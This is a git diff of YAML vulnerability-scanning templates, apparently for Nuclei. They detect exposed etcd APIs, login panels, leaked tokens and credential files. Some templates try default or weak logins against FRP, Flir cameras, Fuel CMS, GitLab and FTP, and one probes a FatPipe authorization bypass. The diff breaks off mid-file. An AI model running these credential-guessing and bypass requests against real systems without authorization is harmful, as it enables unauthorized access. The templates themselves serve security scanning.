b/poc/auth/etcd-keys.yaml @@ -1,22 +1,26 @@ id: etcd-keys + info: name: Etcd Keys author: sharath severity: info description: Scans for etcd keys tags: tech,k8s,kubernetes,devops,etcd + requests: - method: GET path: - "{{BaseURL}}/v2/keys/" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - '"node":' - '"key":' - condition: and + condition: and \ No newline at end of file diff --git a/poc/auth/etcd-unauthenticated-api.yaml b/poc/auth/etcd-unauthenticated-api.yaml index b41d5c896c..1c523c0a06 100644 --- a/poc/auth/etcd-unauthenticated-api.yaml +++ b/poc/auth/etcd-unauthenticated-api.yaml @@ -1,40 +1,28 @@ id: http-etcd-unauthenticated-api-data-leak - info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high - reference: - - https://hackerone.com/reports/1088429 - metadata: - max-request: 1 - tags: misconfig,hackerone,unauth,etcd - -http: + reference: https://hackerone.com/reports/1088429 + tags: unauth +requests: - method: GET path: - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and matchers: - type: word - part: body words: - '"roles"' - '"permissions"' - '"role"' - '"kv"' condition: and - + part: body + - type: status + status: + - 200 - type: word part: header words: - "text/plain" - - "application/json" - condition: or - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100897d3dde5e9a2dfd0ab7d17ab781c555d44ad28bc754236ec6bf33a7ec4c0d7c022100f5ba5418fa82fa65ff1d95bedc9dffea5b1861016c575cc71e7898fbd6c8a3ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/exacqvision-default-login-7275.yaml b/poc/auth/exacqvision-default-login-7275.yaml index a553507ff3..872006f74d 100644 --- a/poc/auth/exacqvision-default-login-7275.yaml +++ b/poc/auth/exacqvision-default-login-7275.yaml @@ -1,19 +1,14 @@ id: exacqvision-default-login - info: name: ExacqVision Default Login author: ELSFA7110 severity: high description: ExacqVision Web Service default login credentials (admin/admin256) were discovered. - reference: - - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + tags: exacqvision,default-login + reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf classification: cwe-id: cwe-798 - metadata: - max-request: 1 - tags: exacqvision,default-login - -http: +requests: - raw: - | POST /service.web HTTP/1.1 @@ -22,25 +17,21 @@ http: Connection: close action=login&u={{username}}&p={{password}} - payloads: username: - admin password: - admin256 attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: - "application/json" - - type: word part: body condition: and @@ -48,4 +39,4 @@ http: - '"auth":' - '"success": true' -# digest: 490a00463044022038ccb4009e1ac3a0d2c62ec1b183d9bc9c4a35bf19c1f2a4389a971af982cdd10220143d0e3a6e638cdcc1a026cf2f357281a6c9cd659111ac7caa19f080f9fe3eac:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/exacqvision-default-login-7277.yaml b/poc/auth/exacqvision-default-login.yaml similarity index 100% rename from poc/auth/exacqvision-default-login-7277.yaml rename to poc/auth/exacqvision-default-login.yaml diff --git a/poc/auth/faraday-login-7395.yaml b/poc/auth/faraday-login-7395.yaml deleted file mode 100644 index 14e0f98189..0000000000 --- a/poc/auth/faraday-login-7395.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: faraday-login - -info: - name: Faraday Login - author: dhiyaneshDK - severity: info - reference: - - https://www.shodan.io/search?query=html%3A%22faradayApp%22 - tags: panel,faraday - -requests: - - method: GET - path: - - '{{BaseURL}}/#/login' - - matchers-condition: and - matchers: - - type: word - words: - - 'ng-app="faradayApp">' - - - type: status - status: - - 200 diff --git a/poc/auth/faraday-login-7397.yaml b/poc/auth/faraday-login-7397.yaml deleted file mode 100644 index 0fe797e43d..0000000000 --- a/poc/auth/faraday-login-7397.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: faraday-login -info: - name: Faraday Login - author: dhiyaneshDK - severity: info - reference: - - https://www.shodan.io/search?query=html%3A%22faradayApp%22 - tags: panel,faraday -requests: - - method: GET - path: - - '{{BaseURL}}/#/login' - matchers-condition: and - matchers: - - type: word - words: - - 'ng-app="faradayApp">' - - type: status - status: - - 200 diff --git a/poc/auth/fatpipe-auth-bypass-7431.yaml b/poc/auth/fatpipe-auth-bypass-7431.yaml new file mode 100644 index 0000000000..50a5f2a66b --- /dev/null +++ b/poc/auth/fatpipe-auth-bypass-7431.yaml @@ -0,0 +1,42 @@ +id: fatpipe-auth-bypass + +info: + name: FatPipe WARP 10.2.2 - Authorization Bypass + author: gy741 + severity: high + description: FatPipe WARP 10.2.2 contains an authorization bypass vulnerability. Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result, an attacker can bypass proper authorization and access resources behind protected pages. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php + - https://www.fatpipeinc.com/support/advisories.php + metadata: + max-request: 1 + tags: fatpipe,auth-bypass,router + +http: + - raw: + - | + GET /fpui/jsp/index.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "productType" + - "type:" + - "version:" + - "FatPipe Networks" + condition: and + + extractors: + - type: regex + part: body + regex: + - 'version: "([0-9.a-z]+)"' + +# digest: 4a0a00473045022100d1edc48e65ce1c70eb9bace16c5bcd95326c7db7e6e46ce8d3dd077774c7b5b6022051350553635bcf5ed8bd71299dc6e198acde0bf60a878b29c8e1ba5e21a30866:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/fatpipe-auth-bypass.yaml b/poc/auth/fatpipe-auth-bypass.yaml deleted file mode 100644 index 01f8c435f9..0000000000 --- a/poc/auth/fatpipe-auth-bypass.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: fatpipe-auth-bypass -info: - name: FatPipe Networks WARP 10.2.2 Authorization Bypass - author: gy741 - severity: high - description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - - https://www.fatpipeinc.com/support/advisories.php - tags: fatpipe,auth-bypass,router -requests: - - raw: - - | - GET /fpui/jsp/index.jsp HTTP/1.1 - Host: {{Hostname}} - Accept: */* - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "productType" - - "type:" - - "version:" - - "FatPipe Networks" - condition: and - extractors: - - type: regex - part: body - regex: - - 'version: "([0-9.a-z]+)"' diff --git a/poc/auth/fcm-server-key.yaml b/poc/auth/fcm-server-key.yaml index f6bd187a36..e97903cc84 100644 --- a/poc/auth/fcm-server-key.yaml +++ b/poc/auth/fcm-server-key.yaml @@ -1,24 +1,16 @@ id: fcm-server-key - info: name: FCM Server Key - author: absshax + author: Abss (@absshax) severity: high - reference: - - https://abss.me/posts/fcm-takeover - metadata: - max-request: 1 tags: exposure,token,google - -http: + reference: https://abss.me/posts/fcm-takeover +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" - -# digest: 4a0a00473045022100b41bb0ec98e486a4c7fd946999c22c3cb30362c9107cf13d9d316e8c5928c89d02207435889383de319947eb4cdfb163f9e236927f766534c57020d12e198e175c5d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/fireware-xtm-user-authentication.yaml b/poc/auth/fireware-xtm-user-authentication.yaml index d38f4f8713..89c8b1d11b 100644 --- a/poc/auth/fireware-xtm-user-authentication.yaml +++ b/poc/auth/fireware-xtm-user-authentication.yaml @@ -1,20 +1,14 @@ id: fireware-xtm-user-authentication info: - name: Fireware XTM Login Panel - Detect + name: Fireware XTM User Authentication author: dhiyaneshDK severity: info - description: Fireware XTM login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 shodan-query: http.title:"Fireware XTM User Authentication" tags: panel -http: +requests: - method: GET path: - '{{BaseURL}}/sslvpn_logon.shtml' @@ -24,9 +18,6 @@ http: - type: word words: - 'User Authentication' - - type: status status: - 200 - -# digest: 4a0a00473045022100d044b71381575b0b34791247fdb14bbe286b152c3346e804a337446d48aa30620220169956313aa7d47b9f71ddfd6da3b5c07f63e1969868ee97bb8d5fedda86431f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/flir-default-login-7514.yaml b/poc/auth/flir-default-login-7514.yaml deleted file mode 100644 index b1c90be110..0000000000 --- a/poc/auth/flir-default-login-7514.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: flir-default-login - -info: - name: Flir Default Login - author: pikpikcu - severity: medium - description: Flir default login credentials (admin/admin) were discovered. - reference: - - https://securitycamcenter.com/flir-default-password/ - classification: - cwe-id: CWE-798 - metadata: - max-request: 1 - tags: default-login,flir,camera,iot - -http: - - raw: - - | - POST /login/dologin HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - user_name={{username}}&user_password={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - '"success"' - - - type: dsl - dsl: - - contains(tolower(header), 'text/html') - - contains(tolower(header), 'phpsessid') - - contains(tolower(header), 'showcameraid') - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022011a29aa237bdcac2c00b8913d9f129c277697aae09bc972746e09267fe6b16be022100b473d730465a7034cfb0baf995f39d559a2ec037cc569d50afb7893b744c090d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/flir-default-login.yaml b/poc/auth/flir-default-login.yaml new file mode 100644 index 0000000000..c98ccc6f1c --- /dev/null +++ b/poc/auth/flir-default-login.yaml @@ -0,0 +1,35 @@ +id: flir-default-login +info: + name: Flir Default Login + author: pikpikcu + severity: medium + tags: default-login,flir,camera,iot +requests: + - raw: + - | + POST /login/dologin HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + user_name={{username}}&user_password={{password}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"success"' + - type: dsl + dsl: + - contains(tolower(all_headers), 'text/html') + - contains(tolower(all_headers), 'phpsessid') + - contains(tolower(all_headers), 'showcameraid') + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/frp-default-login-7556.yaml b/poc/auth/frp-default-login-7556.yaml deleted file mode 100644 index 0402c27460..0000000000 --- a/poc/auth/frp-default-login-7556.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: frp-default-login - -info: - name: FRP Default Login - author: pikpikcu - severity: high - description: FRP default login credentials were discovered. - tags: frp,default-login - reference: https://github.com/fatedier/frp/issues/1840 - classification: - cwe-id: CWE-798 - -requests: - - raw: - - | - GET /api/proxy/tcp HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "proxies" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/frp-default-login-7557.yaml b/poc/auth/frp-default-login-7557.yaml index b6c3bc4c4c..06ef7757f7 100644 --- a/poc/auth/frp-default-login-7557.yaml +++ b/poc/auth/frp-default-login-7557.yaml @@ -1,42 +1,29 @@ id: frp-default-login - info: - name: FRP Default Login + name: Frp Default Login author: pikpikcu severity: high - description: FRP default login credentials were discovered. - reference: - - https://github.com/fatedier/frp/issues/1840 - classification: - cwe-id: CWE-798 - metadata: - max-request: 1 tags: frp,default-login - -http: + reference: https://github.com/fatedier/frp/issues/1840 +requests: - raw: - | GET /api/proxy/tcp HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - type: word words: - - '"proxies":' + - "proxies" part: body condition: and - - type: status status: - 200 - -# digest: 4b0a00483046022100f6c07cdc03b58a288d1b0880547f64dbb95efc59706c3330afad7ec8cadaefe0022100cc3bcfa435537eb46fbbe86ec43729e1c763f2f69f7c893febc224ee9fac0aad:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ftp-credentials-exposure-7568.yaml b/poc/auth/ftp-credentials-exposure-7568.yaml deleted file mode 100644 index d2f9e9e052..0000000000 --- a/poc/auth/ftp-credentials-exposure-7568.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: ftp-credentials-exposure - -info: - name: FTP Credentials Exposure - author: pikpikcu - severity: high - description: FTP credentials were detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - google-query: inurl:"/ftpsync.settings" - tags: config,ftp,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/ftpsync.settings" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "FTPSync" - - "overwrite_newer_prevention" - - "default_folder_permissions" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a0047304502201e28c911f8fabf5fe779e079a838becaff04cf7d4f09b371d3531ae4439668ed022100d6c19923331e37144d1f4e0a89f37af21050a0d4a6a925016646f72bac506cf6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ftp-credentials-exposure.yaml b/poc/auth/ftp-credentials-exposure.yaml new file mode 100644 index 0000000000..a0650c5bb3 --- /dev/null +++ b/poc/auth/ftp-credentials-exposure.yaml @@ -0,0 +1,22 @@ +id: ftp-credentials-exposure +info: + name: FTP credentials exposure + author: pikpikcu + severity: medium + tags: config,ftp,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/ftpsync.settings" + matchers-condition: and + matchers: + - type: word + words: + - FTPSync + - overwrite_newer_prevention + - default_folder_permissions + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/ftp-weak-credentials-7570.yaml b/poc/auth/ftp-weak-credentials-7570.yaml deleted file mode 100644 index b93671d3bb..0000000000 --- a/poc/auth/ftp-weak-credentials-7570.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: ftp-weak-credentials - -info: - name: FTP Service - Credential Weakness - author: pussycat0x - severity: high - description: An FTP service was accessed with easily guessed credentials. - reference: - - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ - classification: - cvss-score: 8.5 - cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N - tags: network,ftp,default-login,service - -network: - - - inputs: - - data: "USER {{username}}\r\nPASS {{password}}\r\n" - - host: - - "{{Hostname}}" - - "{{Host}}:21" - - attack: clusterbomb - payloads: - username: - - admin - - root - password: - - password - - toor - - nas - - guest - - default - - pass1 - - stingray - - matchers: - - type: word - words: - - "230 Login successful" - -# Enhanced by mp on 2022/05/23 diff --git a/poc/auth/ftp-weak-credentials.yaml b/poc/auth/ftp-weak-credentials.yaml index 88e28af4e4..a81c1773d3 100644 --- a/poc/auth/ftp-weak-credentials.yaml +++ b/poc/auth/ftp-weak-credentials.yaml @@ -1,15 +1,28 @@ id: ftp-weak-credentials + info: - name: FTP Service with weak credentials + name: FTP Service - Credential Weakness author: pussycat0x - severity: critical + severity: high + description: An FTP service was accessed with easily guessed credentials. + reference: + - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ + classification: + cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N + cvss-score: 8.5 + metadata: + max-request: 1 tags: network,ftp,default-login,service -network: + +tcp: + - inputs: - data: "USER {{username}}\r\nPASS {{password}}\r\n" + host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 + attack: clusterbomb payloads: username: @@ -23,7 +36,9 @@ network: - default - pass1 - stingray + matchers: - type: word words: - "230 Login successful" +# digest: 4a0a0047304502210091443984db463385943f03987aba6dc71b402521fe000709f10ef889b8513bad0220404de36585bc13279c4c256e013fcd8125eacf1b882f564130ca8007abd74220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/fuelcms-default-login-7571.yaml b/poc/auth/fuelcms-default-login-7571.yaml index 9a64ca8b8c..c46140539c 100644 --- a/poc/auth/fuelcms-default-login-7571.yaml +++ b/poc/auth/fuelcms-default-login-7571.yaml @@ -1,33 +1,34 @@ id: fuelcms-default-login + info: - name: Fuel CMS - Default Admin Discovery + name: Fuel CMS Default Credentials author: Adam Crosser severity: high description: Fuel CMS default admin credentials were discovered. reference: - https://docs.getfuelcms.com/general/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: fuelcms,default-login,oss + requests: - raw: - | GET /fuel/login HTTP/1.1 Host: {{Hostname}} + - | POST /fuel/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} + attack: pitchfork payloads: username: - admin password: - admin + cookie-reuse: true matchers-condition: and matchers: @@ -35,13 +36,16 @@ requests: part: header words: - "/fuel/dashboard" + - type: regex part: header regex: - 'fuel_(.*)=' + - type: status status: - 302 + extractors: - type: regex part: body @@ -50,5 +54,3 @@ requests: group: 1 regex: - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' - -# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/fuelcms-default-login-7572.yaml b/poc/auth/fuelcms-default-login-7572.yaml index 823352d52f..e2940c8be6 100644 --- a/poc/auth/fuelcms-default-login-7572.yaml +++ b/poc/auth/fuelcms-default-login-7572.yaml @@ -1,21 +1,13 @@ id: fuelcms-default-login - info: - name: Fuel CMS - Default Admin Discovery + name: Fuel CMS Default Credentials author: Adam Crosser severity: high description: Fuel CMS default admin credentials were discovered. reference: - https://docs.getfuelcms.com/general/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 2 tags: fuelcms,default-login,oss - -http: +requests: - raw: - | GET /fuel/login HTTP/1.1 @@ -26,30 +18,26 @@ http: Content-Type: application/x-www-form-urlencoded user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} - attack: pitchfork payloads: username: - admin password: - admin - + cookie-reuse: true matchers-condition: and matchers: - type: word part: header words: - "/fuel/dashboard" - - type: regex part: header regex: - 'fuel_(.*)=' - - type: status status: - 302 - extractors: - type: regex part: body @@ -58,5 +46,3 @@ http: group: 1 regex: - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' - -# digest: 490a0046304402206823cbd53bbf104095e4720a47b17ec31c319f5a9386bae411fb2b06bf60a45b02205744e27cd6385cf0b20fd329c19cbbaab2a4fb9019a71fe6d701461937b6147c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/general-tokens-7580.yaml b/poc/auth/general-tokens-7580.yaml index 695d2dc6e9..6ade1f3cd0 100644 --- a/poc/auth/general-tokens-7580.yaml +++ b/poc/auth/general-tokens-7580.yaml @@ -1,16 +1,13 @@ id: generic-tokens - info: name: Generic Tokens author: nadino,geeknik severity: info - tags: exposure,token - + tags: exposure,token,generic requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: dsl @@ -21,16 +18,16 @@ requests: - regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - - type: regex part: body regex: - - '(K|k)ey([U|u]p|[D|d]own|[P|p]ress)' - - '(K|k)eyboard(N|n)avigation' - - '[P|p]assword([E|e]mail[N|n]ot[F|f]ound[M|m]essage|[L|l]abel|[E|e]rror[M|m]essage|[M|m]essage)' + - '(?i)key(sinternal|up|down|press|boardnavigation|words?|board|ebrow|board_fill|_retry_interval|_fetched|_expiresat|board_shortcuts|s_close|s_previous|s_next|s_zoom|s_play_pause)' + - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' + - '(?i)(!native)|(.*keybindings)' + - '(?i)(layout|a)key' + - '(?i)token_expires_in' condition: or negative: true - extractors: - type: regex part: body diff --git a/poc/auth/general-tokens-7583.yaml b/poc/auth/general-tokens-7583.yaml index 1da7b52968..75770dc589 100644 --- a/poc/auth/general-tokens-7583.yaml +++ b/poc/auth/general-tokens-7583.yaml @@ -4,11 +4,9 @@ info: name: Generic Tokens author: nadino,geeknik severity: unknown - metadata: - max-request: 1 tags: exposure,token,generic -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -46,5 +44,3 @@ http: - (S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)()*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? - (A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? - (P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? - -# digest: 490a0046304402203c58511d5729bfedb3b68adb70f728097898b6ebe49f2d9e2dddd4e1daee42870220505cfaabc1e278cb67776ed8731e2314fb51b31848ba409e0f3d47e43322fcda:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/git-credentials-disclosure-7641.yaml b/poc/auth/git-credentials-disclosure-7641.yaml new file mode 100644 index 0000000000..c6a97b6f21 --- /dev/null +++ b/poc/auth/git-credentials-disclosure-7641.yaml @@ -0,0 +1,32 @@ +id: git-credentials-disclosure + +info: + name: Git Credentials Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/git-credentials-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/.git-credentials" + + matchers-condition: and + matchers: + + - type: word + words: + - "https://" + - "@github.com" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + negative: true \ No newline at end of file diff --git a/poc/auth/git-credentials-disclosure-7640.yaml b/poc/auth/git-credentials-disclosure.yaml similarity index 100% rename from poc/auth/git-credentials-disclosure-7640.yaml rename to poc/auth/git-credentials-disclosure.yaml diff --git a/poc/auth/gitea-login.yaml b/poc/auth/gitea-login.yaml index b816d38bce..f5309e300a 100644 --- a/poc/auth/gitea-login.yaml +++ b/poc/auth/gitea-login.yaml @@ -1,21 +1,26 @@ id: gitea-login info: - name: Gitea Login + name: Gitea Login Panel - Detect author: dhiyaneshDK severity: info + description: Gitea login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: html:"Powered by Gitea Version" tags: gitea,panel -requests: +http: - method: GET path: - '{{BaseURL}}/user/login' matchers-condition: and matchers: - - type: word words: - 'Powered by Gitea Version' @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# digest: 490a00463044022038fc5b03251fb7a538eff2928f385d8c84d83dbf731ce2b3b92cd21ebae1f863022032055fbaa66217e4844ab3103cd581a5d7816f31f3ed4cea7c45e0fd7ec813e0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gitlab-public-signup-7683.yaml b/poc/auth/gitlab-public-signup-7683.yaml deleted file mode 100644 index 93da1f1bfc..0000000000 --- a/poc/auth/gitlab-public-signup-7683.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: gitlab-public-signup -info: - name: GitLab public signup - author: pdteam - severity: info - tags: gitlab,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/users/sign_in" - matchers-condition: and - matchers: - - type: word - words: - - '<a data-qa-selector="register_link" href="/users/sign_up">Register now</a>' - - 'data-qa-selector="new_user_register_button"' - - type: word - words: - - 'https://about.gitlab.com' - - type: status - status: - - 200 - - type: word - negative: true - words: - - '<meta content="GitLab.com" property="og:description">' diff --git a/poc/auth/gitlab-uninitialized-password-7694.yaml b/poc/auth/gitlab-uninitialized-password-7694.yaml index 0dcd636704..a6cdfee354 100644 --- a/poc/auth/gitlab-uninitialized-password-7694.yaml +++ b/poc/auth/gitlab-uninitialized-password-7694.yaml @@ -1,4 +1,5 @@ id: gitlab-uninitialized-password + info: name: Uninitialized GitLab instances author: GitLab Red Team @@ -7,17 +8,19 @@ info: Prior to version 14, GitLab installations required a root password to be set via the web UI. If the administrator skipped this step, any visitor could set a password and control the instance. + metadata: + shodan-query: http.title:"GitLab" reference: - https://gitlab.com/gitlab-org/gitlab/-/issues/211328 - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password - metadata: - shodan-query: http.title:"GitLab" tags: gitlab,misconfig,unauth + requests: - method: GET path: - "{{BaseURL}}/users/sign_in" + redirects: true max-redirects: 2 matchers-condition: and @@ -29,10 +32,12 @@ requests: - 'New password' - 'Confirm new password' condition: and + - type: word part: header words: - 'gitlab_session' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/auth/gitlab-uninitialized-password-7695.yaml b/poc/auth/gitlab-uninitialized-password-7695.yaml index 9e37ead70a..35926f1858 100644 --- a/poc/auth/gitlab-uninitialized-password-7695.yaml +++ b/poc/auth/gitlab-uninitialized-password-7695.yaml @@ -13,16 +13,18 @@ info: - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password metadata: + max-request: 1 shodan-query: http.title:"GitLab" tags: gitlab,misconfig,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/users/sign_in" - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -40,4 +42,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a004630440220255ddce1efef9c0c73f9b9e061ba0fac5010742090aaaaf8ef59cfd9f6d2a9f902204c29bbc43dbf8feb4e409ff27a27d2bde04ee07b042eef88e82a61217cbf4ffc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gitlab-weak-login-7707.yaml b/poc/auth/gitlab-weak-login-7707.yaml index b9e97461ce..7fb809fb41 100644 --- a/poc/auth/gitlab-weak-login-7707.yaml +++ b/poc/auth/gitlab-weak-login-7707.yaml @@ -5,16 +5,17 @@ info: author: Suman_Kar,dwisiswant0 severity: high description: Gitlab default login credentials were discovered. - tags: gitlab,default-login reference: - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab - metadata: - shodan-query: http.title:"GitLab" classification: cwe-id: CWE-798 + metadata: + max-request: 6 + shodan-query: http.title:"GitLab" + tags: gitlab,default-login -requests: +http: - raw: - | POST /oauth/token HTTP/1.1 @@ -31,7 +32,6 @@ requests: - "root" - "admin" - "admin@local.host" - password: - "5iveL!fe" - "123456789" @@ -55,4 +55,4 @@ requests: - '"refresh_token":' condition: and -# Enhanced by mp on 2022/03/03 +# digest: 490a00463044022046b016d8df18dcff00ce41916e0870b3f20c707fc3edd900dbf9897898a41c0d022048a9aeebcf2906096985bd0cadec4bafd6bfa5dd5b3bbd959b1d3c5b0eb4186e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gitlab-weak-login.yaml b/poc/auth/gitlab-weak-login.yaml deleted file mode 100644 index c2bc176084..0000000000 --- a/poc/auth/gitlab-weak-login.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: gitlab-weak-login - -info: - name: Gitlab Weak Login - author: Suman_Kar,dwisiswant0 - severity: high - tags: gitlab,default-login - reference: - - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 - - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab - metadata: - shodan-query: http.title:"GitLab" - -# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user. -# So make sure, not to attempt more than 4 password for same valid user. - -requests: - - raw: - - | - POST /oauth/token HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Referer: {{BaseURL}} - content-type: application/json - - {"grant_type":"password","username":"{{username}}","password":"{{password}}"} - - attack: clusterbomb - payloads: - username: - - "root" - - "admin" - - "admin@local.host" - - password: - - "5iveL!fe" - - "123456789" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - application/json - - - type: word - part: body - words: - - '"access_token":' - - '"token_type":' - - '"refresh_token":' - condition: and \ No newline at end of file diff --git a/poc/auth/gloo-unauth-7722.yaml b/poc/auth/gloo-unauth-7722.yaml index 13346551df..c94f1721c5 100644 --- a/poc/auth/gloo-unauth-7722.yaml +++ b/poc/auth/gloo-unauth-7722.yaml @@ -1,27 +1,36 @@ id: 